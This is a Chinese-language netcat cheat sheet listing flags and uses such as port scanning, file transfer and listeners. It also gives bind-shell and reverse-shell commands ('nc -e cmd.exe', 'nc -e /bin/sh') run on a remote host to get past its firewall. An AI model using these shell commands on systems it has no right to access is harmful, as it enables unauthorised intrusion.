瑞士軍刀:nc.exe
引數說明:
-h 檢視幫助資訊
-d 後台模式
-e prog程式重定向,一但連線就執行[危險]
-i secs延時的間隔
-l 監聽模式,用於入站連線
-l 監聽模式,連線天閉後仍然繼續監聽,直到ctr+c
-n ip位址,不能用網域名稱
-o film記錄16進製制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠端埠
-t 使用telnet互動方式
-u udp模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連線到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的tcp 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 繫結remote主機的cmdshell在remote的tcp 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連線192.168.0.2的5354埠
高階用法:
nc -l -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到ctr+c為止
nc -l -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到ctr+c,同時把結果輸出到c:\log.txt
nc -l -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到ctr+c,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送檔案作用
type.exe c:\honeyport | nc -l -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到ctr+c,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送檔案作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機ip -p 本機埠 *win2k
nc -e /bin/sh 本機ip -p 本機埠 *linux,unix 反向連線突破對方主機的防火牆
本機上用:nc -d -l -p 本機埠 < 要傳送的檔案路徑及名稱
在對方主機上用:nc -vv 本機ip 本機埠 > 存放檔案的路徑及名稱 傳送檔案到對方主機
備 注:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt >> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與》的區別 ">"指:覆蓋;">>"指:儲存到(新增到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用》的則是把二次的結果都儲存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了
nc瑞士軍刀的引數
d 後台模式 e prog 程式重定向,一旦連線,就執行 危險 g gateway source routing hop point s up to 8 g num source routing pointer 4,8,12,h 幫助資訊 i secs 延時的間隔 l 監聽模式,用於入站連線 l 連...
NC瑞士軍刀的具體使用方法
nc的使用方法 netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧.乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路...
NC瑞士軍刀的具體使用方法
netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧.乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很...